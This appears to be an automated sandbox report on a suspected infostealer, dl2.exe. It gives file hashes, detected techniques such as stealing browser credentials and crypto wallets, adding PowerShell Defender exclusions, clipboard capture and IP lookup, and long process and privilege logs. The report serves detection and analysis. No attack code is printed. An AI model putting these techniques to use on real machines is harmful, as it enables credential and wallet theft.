Resubmissions
02-10-2024 11:53
241002-n2j6fsycqb 313-09-2024 04:59
240913-fmwxpswcpb 311-09-2024 15:54
240911-tcmg6sygmm 311-09-2024 15:53
240911-tbsmsszbnh 1025-08-2024 22:53
240825-2t6als1gll 1024-08-2024 21:25
240824-z93hjsscrp 924-08-2024 21:20
240824-z65thazfpa 1021-08-2024 23:05
240821-23av3azamj 1021-08-2024 16:22
240821-tvn4qayekh 321-08-2024 16:20
240821-ttkd5sydng 10Analysis
-
max time kernel
140s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
24-08-2024 21:25
Static task
static1
Behavioral task
behavioral1
Sample
dl2.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
dl2.exe
Resource
win10v2004-20240802-en
General
-
Target
dl2.exe
-
Size
849KB
-
MD5
c2055b7fbaa041d9f68b9d5df9b45edd
-
SHA1
e4bd443bd4ce9029290dcd4bb47cb1a01f3b1b06
-
SHA256
342f04c4720590c40d24078d46d9b19d8175565f0af460598171d58f5ffc48f3
-
SHA512
18905b75938b8af9468b1aa3ffbae796a139c2762e623aa6ffb9ec2b293dd04aa1f90d1ed5a7dbda7853795a3688e368121a134c7f63e527a8e5e7679301a1dc
-
SSDEEP
12288:A3RY3yNqMRTF4q2rxHn2ot/81xpNQyjUXlmoe7ufjHAtjXD7r2:A3RY3R24q+xn/8Xp2yOl5fzQ/2
Malware Config
Signatures
-
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 3392 powershell.exe 6068 powershell.exe 5948 powershell.exe 3520 powershell.exe -
Downloads MZ/PE file
-
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
-
Executes dropped EXE 5 IoCs
Processes:
Bootstrapper.exeBootstrapper.exeBootstrapper.exeBootstrapper.exerar.exepid process 1856 Bootstrapper.exe 5152 Bootstrapper.exe 5612 Bootstrapper.exe 5652 Bootstrapper.exe 5592 rar.exe -
Loads dropped DLL 33 IoCs
Processes:
Bootstrapper.exeBootstrapper.exepid process 5612 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5612 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5652 Bootstrapper.exe 5612 Bootstrapper.exe 5612 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5612 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe 5652 Bootstrapper.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI18562\python310.dll upx behavioral2/memory/5612-308-0x00007FFB44D10000-0x00007FFB4517E000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\_ctypes.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI18562\libffi-7.dll upx behavioral2/memory/5612-336-0x00007FFB53F40000-0x00007FFB53F64000-memory.dmp upx behavioral2/memory/5652-335-0x00007FFB5DF30000-0x00007FFB5DF3F000-memory.dmp upx behavioral2/memory/5652-332-0x00007FFB40460000-0x00007FFB408CE000-memory.dmp upx behavioral2/memory/5612-351-0x00007FFB53C40000-0x00007FFB53C6D000-memory.dmp upx behavioral2/memory/5612-353-0x00007FFB54120000-0x00007FFB5413F000-memory.dmp upx behavioral2/memory/5612-354-0x00007FFB45990000-0x00007FFB45AF9000-memory.dmp upx behavioral2/memory/5612-357-0x00007FFB57880000-0x00007FFB5788D000-memory.dmp upx behavioral2/memory/5652-367-0x00007FFB4B9B0000-0x00007FFB4B9DD000-memory.dmp upx behavioral2/memory/5612-369-0x00007FFB57820000-0x00007FFB5782D000-memory.dmp upx behavioral2/memory/5652-376-0x00007FFB45950000-0x00007FFB45969000-memory.dmp upx behavioral2/memory/5652-377-0x00007FFB45920000-0x00007FFB4594E000-memory.dmp upx behavioral2/memory/5652-401-0x00007FFB542A0000-0x00007FFB542C4000-memory.dmp upx behavioral2/memory/5652-399-0x00007FFB5DF30000-0x00007FFB5DF3F000-memory.dmp upx behavioral2/memory/5652-404-0x00007FFB45970000-0x00007FFB4598F000-memory.dmp upx behavioral2/memory/5652-403-0x00007FFB4B970000-0x00007FFB4B989000-memory.dmp upx behavioral2/memory/5652-402-0x00007FFB45370000-0x00007FFB45428000-memory.dmp upx behavioral2/memory/5652-400-0x00007FFB4B9B0000-0x00007FFB4B9DD000-memory.dmp upx behavioral2/memory/5652-396-0x00007FFB3FAD0000-0x00007FFB3FE45000-memory.dmp upx behavioral2/memory/5652-394-0x00007FFB45920000-0x00007FFB4594E000-memory.dmp upx behavioral2/memory/5652-391-0x000001BFF2600000-0x000001BFF2769000-memory.dmp upx behavioral2/memory/5652-385-0x00007FFB40460000-0x00007FFB408CE000-memory.dmp upx behavioral2/memory/5612-384-0x00007FFB45990000-0x00007FFB45AF9000-memory.dmp upx behavioral2/memory/5652-383-0x00007FFB45900000-0x00007FFB45914000-memory.dmp upx behavioral2/memory/5612-382-0x00007FFB54120000-0x00007FFB5413F000-memory.dmp upx behavioral2/memory/5652-381-0x00007FFB54B10000-0x00007FFB54B1D000-memory.dmp upx behavioral2/memory/5652-380-0x00007FFB3FAD0000-0x00007FFB3FE45000-memory.dmp upx behavioral2/memory/5652-393-0x00007FFB57760000-0x00007FFB5776D000-memory.dmp upx behavioral2/memory/5652-392-0x00007FFB45950000-0x00007FFB45969000-memory.dmp upx behavioral2/memory/5652-379-0x00007FFB45370000-0x00007FFB45428000-memory.dmp upx behavioral2/memory/5652-375-0x00007FFB45970000-0x00007FFB4598F000-memory.dmp upx behavioral2/memory/5652-374-0x00007FFB4B970000-0x00007FFB4B989000-memory.dmp upx behavioral2/memory/5652-373-0x00007FFB57760000-0x00007FFB5776D000-memory.dmp upx behavioral2/memory/5612-372-0x00007FFB3FE50000-0x00007FFB3FF68000-memory.dmp upx behavioral2/memory/5652-371-0x000001BFF2600000-0x000001BFF2769000-memory.dmp upx behavioral2/memory/5652-370-0x000001BFF2600000-0x000001BFF2769000-memory.dmp upx behavioral2/memory/5612-368-0x00007FFB4B990000-0x00007FFB4B9A4000-memory.dmp upx behavioral2/memory/5612-366-0x00007FFB53F40000-0x00007FFB53F64000-memory.dmp upx behavioral2/memory/5652-365-0x00007FFB40460000-0x00007FFB408CE000-memory.dmp upx behavioral2/memory/5612-360-0x00007FFB53C10000-0x00007FFB53C3E000-memory.dmp upx behavioral2/memory/5612-359-0x00007FFB53550000-0x00007FFB53608000-memory.dmp upx behavioral2/memory/5612-358-0x00007FFB400E0000-0x00007FFB40455000-memory.dmp upx behavioral2/memory/5612-356-0x00007FFB44D10000-0x00007FFB4517E000-memory.dmp upx behavioral2/memory/5612-355-0x00007FFB53F20000-0x00007FFB53F39000-memory.dmp upx behavioral2/memory/5612-352-0x00007FFB54460000-0x00007FFB54479000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\_ssl.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\_sqlite3.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\_socket.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\_queue.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\_lzma.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\_hashlib.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\_decimal.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\_bz2.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\unicodedata.pyd upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\sqlite3.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\select.pyd upx behavioral2/memory/5612-428-0x00007FFB53F20000-0x00007FFB53F39000-memory.dmp upx behavioral2/memory/5612-429-0x00007FFB400E0000-0x00007FFB40455000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\libssl-1_1.dll upx C:\Users\Admin\AppData\Local\Temp\_MEI51522\libcrypto-1_1.dll upx behavioral2/memory/5612-339-0x00007FFB59B30000-0x00007FFB59B3F000-memory.dmp upx -
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 127 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exepid process 6116 tasklist.exe 5384 tasklist.exe 3972 tasklist.exe 5248 tasklist.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 3 IoCs
Uses WMIC.exe to determine videocard installed.
Processes:
WMIC.exeWMIC.exeWMIC.exepid process 3820 WMIC.exe 2308 WMIC.exe 4428 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
-
Kills process with taskkill 11 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 5840 taskkill.exe 3968 taskkill.exe 5896 taskkill.exe 3160 taskkill.exe 1844 taskkill.exe 4872 taskkill.exe 6104 taskkill.exe 2456 taskkill.exe 2064 taskkill.exe 1912 taskkill.exe 6112 taskkill.exe -
NTFS ADS 1 IoCs
Processes:
msedge.exedescription ioc process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 672106.crdownload:SmartScreen msedge.exe -
Suspicious behavior: EnumeratesProcesses 29 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1684 msedge.exe 1684 msedge.exe 3044 msedge.exe 3044 msedge.exe 1932 identity_helper.exe 1932 identity_helper.exe 5352 msedge.exe 5352 msedge.exe 3392 powershell.exe 3392 powershell.exe 5948 powershell.exe 5948 powershell.exe 5948 powershell.exe 3392 powershell.exe 6068 powershell.exe 6068 powershell.exe 6068 powershell.exe 5456 powershell.exe 5456 powershell.exe 5456 powershell.exe 220 powershell.exe 220 powershell.exe 220 powershell.exe 3520 powershell.exe 3520 powershell.exe 3520 powershell.exe 5376 powershell.exe 5376 powershell.exe 5376 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
Processes:
msedge.exepid process 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
WMIC.exepowershell.exetasklist.exepowershell.exeWMIC.exedescription pid process Token: SeIncreaseQuotaPrivilege 4372 WMIC.exe Token: SeSecurityPrivilege 4372 WMIC.exe Token: SeTakeOwnershipPrivilege 4372 WMIC.exe Token: SeLoadDriverPrivilege 4372 WMIC.exe Token: SeSystemProfilePrivilege 4372 WMIC.exe Token: SeSystemtimePrivilege 4372 WMIC.exe Token: SeProfSingleProcessPrivilege 4372 WMIC.exe Token: SeIncBasePriorityPrivilege 4372 WMIC.exe Token: SeCreatePagefilePrivilege 4372 WMIC.exe Token: SeBackupPrivilege 4372 WMIC.exe Token: SeRestorePrivilege 4372 WMIC.exe Token: SeShutdownPrivilege 4372 WMIC.exe Token: SeDebugPrivilege 4372 WMIC.exe Token: SeSystemEnvironmentPrivilege 4372 WMIC.exe Token: SeRemoteShutdownPrivilege 4372 WMIC.exe Token: SeUndockPrivilege 4372 WMIC.exe Token: SeManageVolumePrivilege 4372 WMIC.exe Token: 33 4372 WMIC.exe Token: 34 4372 WMIC.exe Token: 35 4372 WMIC.exe Token: 36 4372 WMIC.exe Token: SeDebugPrivilege 3392 powershell.exe Token: SeDebugPrivilege 6116 tasklist.exe Token: SeDebugPrivilege 5948 powershell.exe Token: SeIncreaseQuotaPrivilege 4372 WMIC.exe Token: SeSecurityPrivilege 4372 WMIC.exe Token: SeTakeOwnershipPrivilege 4372 WMIC.exe Token: SeLoadDriverPrivilege 4372 WMIC.exe Token: SeSystemProfilePrivilege 4372 WMIC.exe Token: SeSystemtimePrivilege 4372 WMIC.exe Token: SeProfSingleProcessPrivilege 4372 WMIC.exe Token: SeIncBasePriorityPrivilege 4372 WMIC.exe Token: SeCreatePagefilePrivilege 4372 WMIC.exe Token: SeBackupPrivilege 4372 WMIC.exe Token: SeRestorePrivilege 4372 WMIC.exe Token: SeShutdownPrivilege 4372 WMIC.exe Token: SeDebugPrivilege 4372 WMIC.exe Token: SeSystemEnvironmentPrivilege 4372 WMIC.exe Token: SeRemoteShutdownPrivilege 4372 WMIC.exe Token: SeUndockPrivilege 4372 WMIC.exe Token: SeManageVolumePrivilege 4372 WMIC.exe Token: 33 4372 WMIC.exe Token: 34 4372 WMIC.exe Token: 35 4372 WMIC.exe Token: 36 4372 WMIC.exe Token: SeIncreaseQuotaPrivilege 3820 WMIC.exe Token: SeSecurityPrivilege 3820 WMIC.exe Token: SeTakeOwnershipPrivilege 3820 WMIC.exe Token: SeLoadDriverPrivilege 3820 WMIC.exe Token: SeSystemProfilePrivilege 3820 WMIC.exe Token: SeSystemtimePrivilege 3820 WMIC.exe Token: SeProfSingleProcessPrivilege 3820 WMIC.exe Token: SeIncBasePriorityPrivilege 3820 WMIC.exe Token: SeCreatePagefilePrivilege 3820 WMIC.exe Token: SeBackupPrivilege 3820 WMIC.exe Token: SeRestorePrivilege 3820 WMIC.exe Token: SeShutdownPrivilege 3820 WMIC.exe Token: SeDebugPrivilege 3820 WMIC.exe Token: SeSystemEnvironmentPrivilege 3820 WMIC.exe Token: SeRemoteShutdownPrivilege 3820 WMIC.exe Token: SeUndockPrivilege 3820 WMIC.exe Token: SeManageVolumePrivilege 3820 WMIC.exe Token: 33 3820 WMIC.exe Token: 34 3820 WMIC.exe -
Suspicious use of FindShellTrayWindow 38 IoCs
Processes:
msedge.exepid process 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe -
Suspicious use of SendNotifyMessage 24 IoCs
Processes:
msedge.exepid process 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe 3044 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
dl2.exedl2.exepid process 2424 dl2.exe 2676 dl2.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 3044 wrote to memory of 3276 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 3276 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4968 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 1684 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 1684 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe PID 3044 wrote to memory of 4720 3044 msedge.exe msedge.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\dl2.exe"C:\Users\Admin\AppData\Local\Temp\dl2.exe"1⤵
- Suspicious use of SetWindowsHookEx
PID:2424
-
C:\Users\Admin\AppData\Local\Temp\dl2.exeC:\Users\Admin\AppData\Local\Temp\dl2.exe {68D4A697-584F-4F49-88A1-63BA3B2BF2FC}1⤵
- Suspicious use of SetWindowsHookEx
PID:2676
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3044 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7ffb445e46f8,0x7ffb445e4708,0x7ffb445e47182⤵PID:3276
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:22⤵PID:4968
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1684 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2892 /prefetch:82⤵PID:4720
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵PID:1800
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3340 /prefetch:12⤵PID:1932
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4928 /prefetch:12⤵PID:2172
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:12⤵PID:1000
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:82⤵PID:1832
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3432 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1932 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:12⤵PID:1504
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:1064
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:12⤵PID:5300
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:12⤵PID:6128
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4996 /prefetch:12⤵PID:4708
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,15965399798012388519,7297623257117488532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4288 /prefetch:12⤵PID:5432
-
